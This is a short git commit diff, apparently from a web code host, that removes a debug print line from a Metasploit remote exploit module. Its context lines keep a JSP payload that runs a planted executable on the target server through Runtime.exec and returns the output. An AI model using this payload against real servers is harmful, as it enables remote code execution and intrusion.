remove printline
parent
0067d25180
commit
2bfc8e59be
|
@ -65,7 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
cookie = res.get_cookies
|
||||
|
||||
p cookie
|
||||
exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
|
||||
|
||||
res = send_request_cgi({
|
||||
|
|
Loading…
Reference in New Issue